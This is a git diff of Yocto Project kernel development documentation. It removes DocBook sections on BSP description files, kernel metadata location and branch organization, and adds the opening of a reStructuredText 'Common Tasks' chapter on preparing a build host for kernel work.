-        <title>BSP Descriptions</title>
-
-        <para>
-            BSP descriptions (i.e. <filename>*.scc</filename> files)
-            combine kernel types with hardware-specific features.
-            The hardware-specific Metadata is typically defined
-            independently in the BSP layer, and then aggregated with each
-            supported kernel type.
-            <note>
-                For BSPs supported by the Yocto Project, the BSP description
-                files are located in the <filename>bsp</filename> directory
-                of the
-                <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/yocto-kernel-cache/tree/bsp'><filename>yocto-kernel-cache</filename></ulink>
-                repository organized under the "Yocto Linux Kernel" heading
-                in the
-                <ulink url='http://git.yoctoproject.org/cgit/cgit.cgi'>Yocto Project Source Repositories</ulink>.
-            </note>
-        </para>
-
-        <para>
-            This section overviews the BSP description structure, the
-            aggregation concepts, and presents a detailed example using
-            a BSP supported by the Yocto Project (i.e. BeagleBone Board).
-            For complete information on BSP layer file hierarchy, see the
-            <ulink url='&YOCTO_DOCS_BSP_URL;'>Yocto Project Board Support Package (BSP) Developer's Guide</ulink>.
-        </para>
-
-        <section id='bsp-description-file-overview'>
-            <title>Overview</title>
-
-            <para>
-                For simplicity, consider the following root BSP layer
-                description files for the BeagleBone board.
-                These files employ both a structure and naming convention
-                for consistency.
-                The naming convention for the file is as follows:
-                <literallayout class='monospaced'>
-     <replaceable>bsp_root_name</replaceable>-<replaceable>kernel_type</replaceable>.scc
-                </literallayout>
-                Here are some example root layer BSP filenames for the
-                BeagleBone Board BSP, which is supported by the Yocto Project:
-                <literallayout class='monospaced'>
-     beaglebone-standard.scc
-     beaglebone-preempt-rt.scc
-                </literallayout>
-                Each file uses the root name (i.e "beaglebone") BSP name
-                followed by the kernel type.
-            </para>
-
-            <para>
-                Examine the <filename>beaglebone-standard.scc</filename>
-                file:
-                <literallayout class='monospaced'>
-     define KMACHINE beaglebone
-     define KTYPE standard
-     define KARCH arm
-
-     include ktypes/standard/standard.scc
-     branch beaglebone
-
-     include beaglebone.scc
-
-     # default policy for standard kernels
-     include features/latencytop/latencytop.scc
-     include features/profiling/profiling.scc
-                </literallayout>
-                Every top-level BSP description file should define the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-KMACHINE'><filename>KMACHINE</filename></ulink>,
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-KTYPE'><filename>KTYPE</filename></ulink>,
-                and <ulink url='&YOCTO_DOCS_REF_URL;#var-KARCH'><filename>KARCH</filename></ulink>
-                variables.
-                These variables allow the OpenEmbedded build system to identify
-                the description as meeting the criteria set by the recipe being
-                built.
-                This example supports the "beaglebone" machine for the
-                "standard" kernel and the "arm" architecture.
-            </para>
-
-            <para>
-                Be aware that a hard link between the
-                <filename>KTYPE</filename> variable and a kernel type
-                description file does not exist.
-                Thus, if you do not have the kernel type defined in your kernel
-                Metadata as it is here, you only need to ensure that the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-LINUX_KERNEL_TYPE'><filename>LINUX_KERNEL_TYPE</filename></ulink>
-                variable in the kernel recipe and the
-                <filename>KTYPE</filename> variable in the BSP description
-                file match.
-            </para>
-
-            <para>
-                To separate your kernel policy from your hardware configuration,
-                you include a kernel type (<filename>ktype</filename>), such as
-                "standard".
-                In the previous example, this is done using the following:
-                <literallayout class='monospaced'>
-     include ktypes/standard/standard.scc
-                </literallayout>
-                This file aggregates all the configuration fragments, patches,
-                and features that make up your standard kernel policy.
-                See the "<link linkend='kernel-types'>Kernel Types</link>"
-                section for more information.
-            </para>
-
-            <para>
-                To aggregate common configurations and features specific to the
-                kernel for <replaceable>mybsp</replaceable>, use the following:
-                <literallayout class='monospaced'>
-     include <replaceable>mybsp</replaceable>.scc
-                </literallayout>
-                You can see that in the BeagleBone example with the following:
-                <literallayout class='monospaced'>
-     include beaglebone.scc
-                </literallayout>
-                For information on how to break a complete
-                <filename>.config</filename> file into the various
-                configuration fragments, see the
-                "<link linkend='creating-config-fragments'>Creating Configuration Fragments</link>"
-                section.
-            </para>
-
-            <para>
-                Finally, if you have any configurations specific to the
-                hardware that are not in a <filename>*.scc</filename> file,
-                you can include them as follows:
-                <literallayout class='monospaced'>
-     kconf hardware <replaceable>mybsp</replaceable>-<replaceable>extra</replaceable>.cfg
-                </literallayout>
-                The BeagleBone example does not include these types of
-                configurations.
-                However, the Malta 32-bit board does ("mti-malta32").
-                Here is the <filename>mti-malta32-le-standard.scc</filename>
-                file:
-                <literallayout class='monospaced'>
-     define KMACHINE mti-malta32-le
-     define KMACHINE qemumipsel
-     define KTYPE standard
-     define KARCH mips
-
-     include ktypes/standard/standard.scc
-     branch mti-malta32
-
-     include mti-malta32.scc
-     kconf hardware mti-malta32-le.cfg
-                </literallayout>
-            </para>
-        </section>
-
-        <section id='bsp-description-file-example-minnow'>
-            <title>Example</title>
-
-            <para>
-                Many real-world examples are more complex.
-                Like any other <filename>.scc</filename> file, BSP
-                descriptions can aggregate features.
-                Consider the Minnow BSP definition given the
-                <filename>linux-yocto-4.4</filename> branch of the
-                <filename>yocto-kernel-cache</filename> (i.e.
-                <filename>yocto-kernel-cache/bsp/minnow/minnow.scc</filename>):
-                <note>
-                    Although the Minnow Board BSP is unused, the Metadata
-                    remains and is being used here just as an example.
-                </note>
-                <literallayout class='monospaced'>
-         include cfg/x86.scc
-         include features/eg20t/eg20t.scc
-         include cfg/dmaengine.scc
-         include features/power/intel.scc
-         include cfg/efi.scc
-         include features/usb/ehci-hcd.scc
-         include features/usb/ohci-hcd.scc
-         include features/usb/usb-gadgets.scc
-         include features/usb/touchscreen-composite.scc
-         include cfg/timer/hpet.scc
-         include features/leds/leds.scc
-         include features/spi/spidev.scc
-         include features/i2c/i2cdev.scc
-         include features/mei/mei-txe.scc
-
-         # Earlyprintk and port debug requires 8250
-         kconf hardware cfg/8250.cfg
-
-         kconf hardware minnow.cfg
-         kconf hardware minnow-dev.cfg
-                </literallayout>
-            </para>
-
-            <para>
-                The <filename>minnow.scc</filename> description file includes
-                a hardware configuration fragment
-                (<filename>minnow.cfg</filename>) specific to the Minnow
-                BSP as well as several more general configuration
-                fragments and features enabling hardware found on the
-                machine.
-                This <filename>minnow.scc</filename> description file is then
-                included in each of the three
-                "minnow" description files for the supported kernel types
-                (i.e. "standard", "preempt-rt", and "tiny").
-                Consider the "minnow" description for the "standard" kernel
-                type (i.e. <filename>minnow-standard.scc</filename>:
-                <literallayout class='monospaced'>
-         define KMACHINE minnow
-         define KTYPE standard
-         define KARCH i386
-
-         include ktypes/standard
-
-         include minnow.scc
-
-         # Extra minnow configs above the minimal defined in minnow.scc
-         include cfg/efi-ext.scc
-         include features/media/media-all.scc
-         include features/sound/snd_hda_intel.scc
-
-         # The following should really be in standard.scc
-         # USB live-image support
-         include cfg/usb-mass-storage.scc
-         include cfg/boot-live.scc
-
-         # Basic profiling
-         include features/latencytop/latencytop.scc
-         include features/profiling/profiling.scc
-
-         # Requested drivers that don't have an existing scc
-         kconf hardware minnow-drivers-extra.cfg
-                </literallayout>
-                The <filename>include</filename> command midway through the file
-                includes the <filename>minnow.scc</filename> description that
-                defines all enabled hardware for the BSP that is common to
-                all kernel types.
-                Using this command significantly reduces duplication.
-            </para>
-
-            <para>
-                Now consider the "minnow" description for the "tiny" kernel
-                type (i.e. <filename>minnow-tiny.scc</filename>):
-                <literallayout class='monospaced'>
-        define KMACHINE minnow
-        define KTYPE tiny
-        define KARCH i386
-
-        include ktypes/tiny
-
-        include minnow.scc
-                </literallayout>
-                As you might expect, the "tiny" description includes quite a
-                bit less.
-                In fact, it includes only the minimal policy defined by the
-                "tiny" kernel type and the hardware-specific configuration
-                required for booting the machine along with the most basic
-                functionality of the system as defined in the base "minnow"
-                description file.
-            </para>
-
-            <para>
-                Notice again the three critical variables:
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-KMACHINE'><filename>KMACHINE</filename></ulink>,
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-KTYPE'><filename>KTYPE</filename></ulink>,
-                and
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-KARCH'><filename>KARCH</filename></ulink>.
-                Of these variables, only <filename>KTYPE</filename>
-                has changed to specify the "tiny" kernel type.
-            </para>
-        </section>
-    </section>
-</section>
-
-<section id='kernel-metadata-location'>
-    <title>Kernel Metadata Location</title>
-
-    <para>
-        Kernel Metadata always exists outside of the kernel tree either
-        defined in a kernel recipe (recipe-space) or outside of the recipe.
-        Where you choose to define the Metadata depends on what you want
-        to do and how you intend to work.
-        Regardless of where you define the kernel Metadata, the syntax used
-        applies equally.
-    </para>
-
-    <para>
-        If you are unfamiliar with the Linux kernel and only wish
-        to apply a configuration and possibly a couple of patches provided to
-        you by others, the recipe-space method is recommended.
-        This method is also a good approach if you are working with Linux kernel
-        sources you do not control or if you just do not want to maintain a
-        Linux kernel Git repository on your own.
-        For partial information on how you can define kernel Metadata in
-        the recipe-space, see the
-        "<link linkend='modifying-an-existing-recipe'>Modifying an Existing Recipe</link>"
-        section.
-    </para>
-
-    <para>
-        Conversely, if you are actively developing a kernel and are already
-        maintaining a Linux kernel Git repository of your own, you might find
-        it more convenient to work with kernel Metadata kept outside the
-        recipe-space.
-        Working with Metadata in this area can make iterative development of
-        the Linux kernel more efficient outside of the BitBake environment.
-    </para>
-
-    <section id='recipe-space-metadata'>
-        <title>Recipe-Space Metadata</title>
-
-        <para>
-            When stored in recipe-space, the kernel Metadata files reside in a
-            directory hierarchy below
-            <ulink url='&YOCTO_DOCS_REF_URL;#var-FILESEXTRAPATHS'><filename>FILESEXTRAPATHS</filename></ulink>.
-            For a linux-yocto recipe or for a Linux kernel recipe derived
-            by copying and modifying
-            <filename>oe-core/meta-skeleton/recipes-kernel/linux/linux-yocto-custom.bb</filename>
-            to a recipe in your layer, <filename>FILESEXTRAPATHS</filename>
-            is typically set to
-            <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-THISDIR'><filename>THISDIR</filename></ulink><filename>}/${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-PN'><filename>PN</filename></ulink><filename>}</filename>.
-            See the "<link linkend='modifying-an-existing-recipe'>Modifying an Existing Recipe</link>"
-            section for more information.
-        </para>
-
-        <para>
-            Here is an example that shows a trivial tree of kernel Metadata
-            stored in recipe-space within a BSP layer:
-            <literallayout class='monospaced'>
-     meta-<replaceable>my_bsp_layer</replaceable>/
-     `-- recipes-kernel
-         `-- linux
-             `-- linux-yocto
-                 |-- bsp-standard.scc
-                 |-- bsp.cfg
-                 `-- standard.cfg
-            </literallayout>
-        </para>
-
-        <para>
-            When the Metadata is stored in recipe-space, you must take
-            steps to ensure BitBake has the necessary information to decide
-            what files to fetch and when they need to be fetched again.
-            It is only necessary to specify the <filename>.scc</filename>
-            files on the
-            <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>.
-            BitBake parses them and fetches any files referenced in the
-            <filename>.scc</filename> files by the <filename>include</filename>,
-            <filename>patch</filename>, or <filename>kconf</filename> commands.
-            Because of this, it is necessary to bump the recipe
-            <ulink url='&YOCTO_DOCS_REF_URL;#var-PR'><filename>PR</filename></ulink>
-            value when changing the content of files not explicitly listed
-            in the <filename>SRC_URI</filename>.
-        </para>
-
-        <para>
-            If the BSP description is in recipe space, you cannot simply list
-            the <filename>*.scc</filename> in the <filename>SRC_URI</filename>
-            statement.
-            You need to use the following form from your kernel append file:
-            <literallayout class='monospaced'>
-     SRC_URI_append_<replaceable>myplatform</replaceable> = " \
-        file://<replaceable>myplatform</replaceable>;type=kmeta;destsuffix=<replaceable>myplatform</replaceable> \
-        "
-            </literallayout>
-        </para>
-    </section>
-
-    <section id='metadata-outside-the-recipe-space'>
-        <title>Metadata Outside the Recipe-Space</title>
-
-        <para>
-            When stored outside of the recipe-space, the kernel Metadata
-            files reside in a separate repository.
-            The OpenEmbedded build system adds the Metadata to the build as
-            a "type=kmeta" repository through the
-            <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
-            variable.
-            As an example, consider the following <filename>SRC_URI</filename>
-            statement from the <filename>linux-yocto_4.12.bb</filename>
-            kernel recipe:
-            <literallayout class='monospaced'>
-     SRC_URI = "git://git.yoctoproject.org/linux-yocto-4.12.git;name=machine;branch=${KBRANCH}; \
-                git://git.yoctoproject.org/yocto-kernel-cache;type=kmeta;name=meta;branch=yocto-4.12;destsuffix=${KMETA}"
-            </literallayout>
-            <filename>${KMETA}</filename>, in this context, is simply used to
-            name the directory into which the Git fetcher places the Metadata.
-            This behavior is no different than any multi-repository
-            <filename>SRC_URI</filename> statement used in a recipe (e.g.
-            see the previous section).
-        </para>
-
-        <para>
-            You can keep kernel Metadata in a "kernel-cache", which is a
-            directory containing configuration fragments.
-            As with any Metadata kept outside the recipe-space, you simply
-            need to use the <filename>SRC_URI</filename> statement with the
-            "type=kmeta" attribute.
-            Doing so makes the kernel Metadata available during the
-            configuration phase.
-        </para>
-
-        <para>
-            If you modify the Metadata, you must not forget to update the
-            <filename>SRCREV</filename> statements in the kernel's recipe.
-            In particular, you need to update the
-            <filename>SRCREV_meta</filename> variable to match the commit in
-            the <filename>KMETA</filename> branch you wish to use.
-            Changing the data in these branches and not updating the
-            <filename>SRCREV</filename> statements to match will cause the
-            build to fetch an older commit.
-        </para>
-    </section>
-</section>
-
-<section id='organizing-your-source'>
-    <title>Organizing Your Source</title>
-
-    <para>
-        Many recipes based on the <filename>linux-yocto-custom.bb</filename>
-        recipe use Linux kernel sources that have only a single
-        branch - "master".
-        This type of repository structure is fine for linear development
-        supporting a single machine and architecture.
-        However, if you work with multiple boards and architectures,
-        a kernel source repository with multiple branches is more
-        efficient.
-        For example, suppose you need a series of patches for one board to boot.
-        Sometimes, these patches are works-in-progress or fundamentally wrong,
-        yet they are still necessary for specific boards.
-        In these situations, you most likely do not want to include these
-        patches in every kernel you build (i.e. have the patches as part of
-        the lone "master" branch).
-        It is situations like these that give rise to multiple branches used
-        within a Linux kernel sources Git repository.
-    </para>
-
-    <para>
-        Repository organization strategies exist that maximize source reuse,
-        remove redundancy, and logically order your changes.
-        This section presents strategies for the following cases:
-        <itemizedlist>
-            <listitem><para>Encapsulating patches in a feature description
-                and only including the patches in the BSP descriptions of
-                the applicable boards.</para></listitem>
-            <listitem><para>Creating a machine branch in your
-                kernel source repository and applying the patches on that
-                branch only.</para></listitem>
-            <listitem><para>Creating a feature branch in your
-                kernel source repository and merging that branch into your
-                BSP when needed.</para></listitem>
-        </itemizedlist>
-    </para>
-
-    <para>
-        The approach you take is entirely up to you
-        and depends on what works best for your development model.
-    </para>
-
-    <section id='encapsulating-patches'>
-        <title>Encapsulating Patches</title>
-
-        <para>
-            if you are reusing patches from an external tree and are not
-            working on the patches, you might find the encapsulated feature
-            to be appropriate.
-            Given this scenario, you do not need to create any branches in the
-            source repository.
-            Rather, you just take the static patches you need and encapsulate
-            them within a feature description.
-            Once you have the feature description, you simply include that into
-            the BSP description as described in the
-            "<link linkend='bsp-descriptions'>BSP Descriptions</link>"
-            section.
-        </para>
-
-        <para>
-            You can find information on how to create patches and BSP
-            descriptions in the "<link linkend='patches'>Patches</link>" and
-            "<link linkend='bsp-descriptions'>BSP Descriptions</link>"
-            sections.
-        </para>
-    </section>
-
-    <section id='machine-branches'>
-        <title>Machine Branches</title>
-
-        <para>
-            When you have multiple machines and architectures to support,
-            or you are actively working on board support, it is more
-            efficient to create branches in the repository based on
-            individual machines.
-            Having machine branches allows common source to remain in the
-            "master" branch with any features specific to a machine stored
-            in the appropriate machine branch.
-            This organization method frees you from continually reintegrating
-            your patches into a feature.
-        </para>
-
-        <para>
-            Once you have a new branch, you can set up your kernel Metadata
-            to use the branch a couple different ways.
-            In the recipe, you can specify the new branch as the
-            <filename>KBRANCH</filename> to use for the board as
-            follows:
-            <literallayout class='monospaced'>
-     KBRANCH = "mynewbranch"
-            </literallayout>
-            Another method is to use the <filename>branch</filename> command
-            in the BSP description:
-            <literallayout class='monospaced'>
-     mybsp.scc:
-        define KMACHINE mybsp
-        define KTYPE standard
-        define KARCH i386
-        include standard.scc
-
-        branch mynewbranch
-
-        include mybsp-hw.scc
-            </literallayout>
-        </para>
-
-        <para>
-            If you find yourself with numerous branches, you might consider
-            using a hierarchical branching system similar to what the
-            Yocto Linux Kernel Git repositories use:
-            <literallayout class='monospaced'>
-     <replaceable>common</replaceable>/<replaceable>kernel_type</replaceable>/<replaceable>machine</replaceable>
-            </literallayout>
-        </para>
-
-        <para>
-            If you had two kernel types, "standard" and "small" for
-            instance, three machines, and <replaceable>common</replaceable>
-            as <filename>mydir</filename>, the branches in your
-            Git repository might look like this:
-            <literallayout class='monospaced'>
-     mydir/base
-     mydir/standard/base
-     mydir/standard/machine_a
-     mydir/standard/machine_b
-     mydir/standard/machine_c
-     mydir/small/base
-     mydir/small/machine_a
-            </literallayout>
-        </para>
-
-        <para>
-            This organization can help clarify the branch relationships.
-            In this case, <filename>mydir/standard/machine_a</filename>
-            includes everything in <filename>mydir/base</filename> and
-            <filename>mydir/standard/base</filename>.
-            The "standard" and "small" branches add sources specific to those
-            kernel types that for whatever reason are not appropriate for the
-            other branches.
-            <note>
-                The "base" branches are an artifact of the way Git manages
-                its data internally on the filesystem: Git will not allow you
-                to use <filename>mydir/standard</filename> and
-                <filename>mydir/standard/machine_a</filename> because it
-                would have to create a file and a directory named "standard".
-            </note>
-        </para>
-    </section>
-
-    <section id='feature-branches'>
-        <title>Feature Branches</title>
-
-        <para>
-            When you are actively developing new features, it can be more
-            efficient to work with that feature as a branch, rather than
-            as a set of patches that have to be regularly updated.
-            The Yocto Project Linux kernel tools provide for this with
-            the <filename>git merge</filename> command.
-        </para>
-
-        <para>
-            To merge a feature branch into a BSP, insert the
-            <filename>git merge</filename> command after any
-            <filename>branch</filename> commands:
-            <literallayout class='monospaced'>
-     mybsp.scc:
-        define KMACHINE mybsp
-        define KTYPE standard
-        define KARCH i386
-        include standard.scc
-
-        branch mynewbranch
-        git merge myfeature
-
-        include mybsp-hw.scc
-            </literallayout>
-        </para>
-    </section>
-</section>
-
-<section id='scc-reference'>
-    <title>SCC Description File Reference</title>
-
-    <para>
-        This section provides a brief reference for the commands you can use
-        within an SCC description file (<filename>.scc</filename>):
-        <itemizedlist>
-            <listitem><para>
-                <filename>branch [ref]</filename>:
-                Creates a new branch relative to the current branch
-                (typically <filename>${KTYPE}</filename>) using
-                the currently checked-out branch, or "ref" if specified.
-                </para></listitem>
-            <listitem><para>
-                <filename>define</filename>:
-                Defines variables, such as
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-KMACHINE'><filename>KMACHINE</filename></ulink>,
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-KTYPE'><filename>KTYPE</filename></ulink>,
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-KARCH'><filename>KARCH</filename></ulink>,
-                and
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-KFEATURE_DESCRIPTION'><filename>KFEATURE_DESCRIPTION</filename></ulink>.
-                </para></listitem>
-            <listitem><para>
-                <filename>include SCC_FILE</filename>:
-                Includes an SCC file in the current file.
-                The file is parsed as if you had inserted it inline.
-                </para></listitem>
-            <listitem><para>
-                <filename>kconf [hardware|non-hardware] CFG_FILE</filename>:
-                Queues a configuration fragment for merging into the final
-                Linux <filename>.config</filename> file.</para></listitem>
-            <listitem><para>
-                <filename>git merge GIT_BRANCH</filename>:
-                Merges the feature branch into the current branch.
-                </para></listitem>
-            <listitem><para>
-                <filename>patch PATCH_FILE</filename>:
-                Applies the patch to the current Git branch.
-                </para></listitem>
-        </itemizedlist>
-    </para>
-</section>
-
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/kernel-dev/kernel-dev-common.rst b/documentation/kernel-dev/kernel-dev-common.rst
new file mode 100644
index 0000000000..6b5e9484d0
--- /dev/null
+++ b/documentation/kernel-dev/kernel-dev-common.rst
@@ -0,0 +1,2031 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+************
+Common Tasks
+************
+
+This chapter presents several common tasks you perform when you work
+with the Yocto Project Linux kernel. These tasks include preparing your
+host development system for kernel development, preparing a layer,
+modifying an existing recipe, patching the kernel, configuring the
+kernel, iterative development, working with your own sources, and
+incorporating out-of-tree modules.
+
+.. note::
+
+   The examples presented in this chapter work with the Yocto Project
+   2.4 Release and forward.
+
+Preparing the Build Host to Work on the Kernel
+==============================================
+
+Before you can do any kernel development, you need to be sure your build
+host is set up to use the Yocto Project. For information on how to get
+set up, see the ":doc:`../dev-manual/dev-manual-start`" section in
+the Yocto Project Development Tasks Manual. Part of preparing the system
+is creating a local Git repository of the
+:term:`Source Directory` (``poky``) on your system. Follow the steps in the
+":ref:`dev-manual/dev-manual-start:cloning the \`\`poky\`\` repository`"
+section in the Yocto Project Development Tasks Manual to set up your
+Source Directory.
+
+.. note::
+
+   Be sure you check out the appropriate development branch or you
+   create your local branch by checking out a specific tag to get the
+   desired version of Yocto Project. See the
+   ":ref:`dev-manual/dev-manual-start:checking out by branch in poky`" and
+   ":ref:`dev-manual/dev-manual-start:checking out by tag in poky`"
+   sections in the Yocto Project Development Tasks Manual for more information.
+
+Kernel development is best accomplished using
+:ref:`devtool <sdk-manual/sdk-extensible:using \`\`devtool\`\` in your sdk workflow>`
+and not through traditional kernel workflow methods. The remainder of
+this section provides information for both scenarios.
+
+Getting Ready to Develop Using ``devtool``
+------------------------------------------
+
+Follow these steps to prepare to update the kernel image using
+``devtool``. Completing this procedure leaves you with a clean kernel
+image and ready to make modifications as described in the
+":ref:`kernel-dev/kernel-dev-common:using \`\`devtool\`\` to patch the kernel`"
+section:
+
+1. *Initialize the BitBake Environment:* Before building an extensible
+   SDK, you need to initialize the BitBake build environment by sourcing
+   the build environment script (i.e. :ref:`structure-core-script`):
+   ::
+
+      $ cd ~/poky
+      $ source oe-init-build-env
+
+   .. note::
+
+      The previous commands assume the
+      :ref:`overview-manual/overview-manual-development-environment:yocto project source repositories`
+      (i.e. ``poky``) have been cloned using Git and the local repository is named
+      "poky".
+
+2. *Prepare Your local.conf File:* By default, the
+   :term:`MACHINE` variable is set to
+   "qemux86-64", which is fine if you are building for the QEMU emulator
+   in 64-bit mode. However, if you are not, you need to set the
+   ``MACHINE`` variable appropriately in your ``conf/local.conf`` file
+   found in the
+   :term:`Build Directory` (i.e.
+   ``~/poky/build`` in this example).
+
+   Also, since you are preparing to work on the kernel image, you need
+   to set the
+   :term:`MACHINE_ESSENTIAL_EXTRA_RRECOMMENDS`
+   variable to include kernel modules.
+
+   In this example we wish to build for qemux86 so we must set the
+   ``MACHINE`` variable to "qemux86" and also add the "kernel-modules".
+   As described we do this by appending to ``conf/local.conf``:
+   ::
+
+      MACHINE = "qemux86"
+      MACHINE_ESSENTIAL_EXTRA_RRECOMMENDS += "kernel-modules"
+
+3. *Create a Layer for Patches:* You need to create a layer to hold
+   patches created for the kernel image. You can use the
+   ``bitbake-layers create-layer`` command as follows:
+   ::
+
+      $ cd ~/poky/build
+      $ bitbake-layers create-layer ../../meta-mylayer
+      NOTE: Starting bitbake server...
+      Add your new layer with 'bitbake-layers add-layer ../../meta-mylayer'
+      $
+
+   .. note::
+
+      For background information on working with common and BSP layers,
+      see the
+      ":ref:`dev-manual/dev-manual-common-tasks:understanding and creating layers`"
+      section in the Yocto Project Development Tasks Manual and the
+      ":ref:`bsp-guide/bsp:bsp layers`" section in the Yocto Project Board
+      Support (BSP) Developer's Guide, respectively. For information on how to
+      use the ``bitbake-layers create-layer`` command to quickly set up a layer,
+      see the
+      ":ref:`dev-manual/dev-manual-common-tasks:creating a general layer using the \`\`bitbake-layers\`\` script`"
+      section in the Yocto Project Development Tasks Manual.
+
+4. *Inform the BitBake Build Environment About Your Layer:* As directed
+   when you created your layer, you need to add the layer to the
+   :term:`BBLAYERS` variable in the
+   ``bblayers.conf`` file as follows:
+   ::
+
+      $ cd ~/poky/build
+      $ bitbake-layers add-layer ../../meta-mylayer
+      NOTE: Starting bitbake server...
+      $
+
+5. *Build the Extensible SDK:* Use BitBake to build the extensible SDK
+   specifically for use with images to be run using QEMU:
+   ::
+
+      $ cd ~/poky/build
+      $ bitbake core-image-minimal -c populate_sdk_ext
+
+   Once
+   the build finishes, you can find the SDK installer file (i.e.
+   ``*.sh`` file) in the following directory:
+   ::
+
+      ~/poky/build/tmp/deploy/sdk
+
+   For this example, the installer file is named
+   ``poky-glibc-x86_64-core-image-minimal-i586-toolchain-ext-DISTRO.sh``.
+
+6. *Install the Extensible SDK:* Use the following command to install
+   the SDK. For this example, install the SDK in the default
+   ``~/poky_sdk`` directory:
+   ::
+
+      $ cd ~/poky/build/tmp/deploy/sdk
+      $ ./poky-glibc-x86_64-core-image-minimal-i586-toolchain-ext-3.1.2.sh
+      Poky (Yocto Project Reference Distro) Extensible SDK installer version 3.1.2
+      ============================================================================
+      Enter target directory for SDK (default: ~/poky_sdk):
+      You are about to install the SDK to "/home/scottrif/poky_sdk". Proceed [Y/n]? Y
+      Extracting SDK......................................done
+      Setting it up...
+      Extracting buildtools...
+      Preparing build system...
+      Parsing recipes: 100% |#################################################################| Time: 0:00:52
+      Initializing tasks: 100% |############## ###############################################| Time: 0:00:04
+      Checking sstate mirror object availability: 100% |######################################| Time: 0:00:00
+      Parsing recipes: 100% |#################################################################| Time: 0:00:33
+      Initializing tasks: 100% |##############################################################| Time: 0:00:00
+      done
+      SDK has been successfully set up and is ready to be used.
+      Each time you wish to use the SDK in a new shell session, you need to source the environment setup script e.g.
+       $ . /home/scottrif/poky_sdk/environment-setup-i586-poky-linux
+
+
+7. *Set Up a New Terminal to Work With the Extensible SDK:* You must set
+   up a new terminal to work with the SDK. You cannot use the same
+   BitBake shell used to build the installer.
+
+   After opening a new shell, run the SDK environment setup script as
+   directed by the output from installing the SDK:
+   ::
+
+      $ source ~/poky_sdk/environment-setup-i586-poky-linux
+      "SDK environment now set up; additionally you may now run devtool to perform development tasks.
+      Run devtool --help for further details.
+
+   .. note::
+
+      If you get a warning about attempting to use the extensible SDK in
+      an environment set up to run BitBake, you did not use a new shell.
+
+8. *Build the Clean Image:* The final step in preparing to work on the
+   kernel is to build an initial image using ``devtool`` in the new
+   terminal you just set up and initialized for SDK work:
+   ::
+
+      $ devtool build-image
+      Parsing recipes: 100% |##########################################| Time: 0:00:05
+      Parsing of 830 .bb files complete (0 cached, 830 parsed). 1299 targets, 47 skipped, 0 masked, 0 errors.
+      WARNING: No packages to add, building image core-image-minimal unmodified
+      Loading cache: 100% |############################################| Time: 0:00:00
+      Loaded 1299 entries from dependency cache.
+      NOTE: Resolving any missing task queue dependencies
+      Initializing tasks: 100% |#######################################| Time: 0:00:07
+      Checking sstate mirror object availability: 100% |###############| Time: 0:00:00
+      NOTE: Executing SetScene Tasks
+      NOTE: Executing RunQueue Tasks
+      NOTE: Tasks Summary: Attempted 2866 tasks of which 2604 didn't need to be rerun and all succeeded.
+      NOTE: Successfully built core-image-minimal. You can find output files in /home/scottrif/poky_sdk/tmp/deploy/images/qemux86
+
+   If you were
+   building for actual hardware and not for emulation, you could flash
+   the image to a USB stick on ``/dev/sdd`` and boot your device. For an
+   example that uses a Minnowboard, see the
+   :yocto_wiki:`TipsAndTricks/KernelDevelopmentWithEsdk </wiki/TipsAndTricks/KernelDevelopmentWithEsdk>`
+   Wiki page.
+
+At this point you have set up to start making modifications to the
+kernel by using the extensible SDK. For a continued example, see the
+":ref:`kernel-dev/kernel-dev-common:using \`\`devtool\`\` to patch the kernel`"
+section.
+
+Getting Ready for Traditional Kernel Development
+------------------------------------------------
+
+Getting ready for traditional kernel development using the Yocto Project
+involves many of the same steps as described in the previous section.
+However, you need to establish a local copy of the kernel source since
+you will be editing these files.
+
+Follow these steps to prepare to update the kernel image using
+traditional kernel development flow with the Yocto Project. Completing
+this procedure leaves you ready to make modifications to the kernel
+source as described in the ":ref:`kernel-dev/kernel-dev-common:using traditional kernel development to patch the kernel`"
+section:
+
+1. *Initialize the BitBake Environment:* Before you can do anything
+   using BitBake, you need to initialize the BitBake build environment
+   by sourcing the build environment script (i.e.
+   :ref:`structure-core-script`).
+   Also, for this example, be sure that the local branch you have
+   checked out for ``poky`` is the Yocto Project &DISTRO_NAME; branch. If
+   you need to checkout out the &DISTRO_NAME; branch, see the
+   ":ref:`dev-manual/dev-manual-start:checking out by branch in poky`"
+   section in the Yocto Project Development Tasks Manual.
+   ::
+
+      $ cd ~/poky
+      $ git branch
+      master
+      * &DISTRO_NAME_NO_CAP;
+      $ source oe-init-build-env
+
+   .. note::
+
+      The previous commands assume the
+      :ref:`overview-manual/overview-manual-development-environment:yocto project source repositories`
+      (i.e. ``poky``) have been cloned using Git and the local repository is named
+      "poky".
+
+2. *Prepare Your local.conf File:* By default, the
+   :term:`MACHINE` variable is set to
+   "qemux86-64", which is fine if you are building for the QEMU emulator
+   in 64-bit mode. However, if you are not, you need to set the
+   ``MACHINE`` variable appropriately in your ``conf/local.conf`` file
+   found in the
+   :term:`Build Directory` (i.e.
+   ``~/poky/build`` in this example).
+
+   Also, since you are preparing to work on the kernel image, you need
+   to set the
+   :term:`MACHINE_ESSENTIAL_EXTRA_RRECOMMENDS`
+   variable to include kernel modules.
+
+   In this example we wish to build for qemux86 so we must set the
+   ``MACHINE`` variable to "qemux86" and also add the "kernel-modules".
+   As described we do this by appending to ``conf/local.conf``:
+   ::
+
+      MACHINE = "qemux86"
+      MACHINE_ESSENTIAL_EXTRA_RRECOMMENDS += "kernel-modules"
+
+3. *Create a Layer for Patches:* You need to create a layer to hold
+   patches created for the kernel image. You can use the
+   ``bitbake-layers create-layer`` command as follows:
+   ::
+
+      $ cd ~/poky/build
+      $ bitbake-layers create-layer ../../meta-mylayer
+      NOTE: Starting bitbake server...
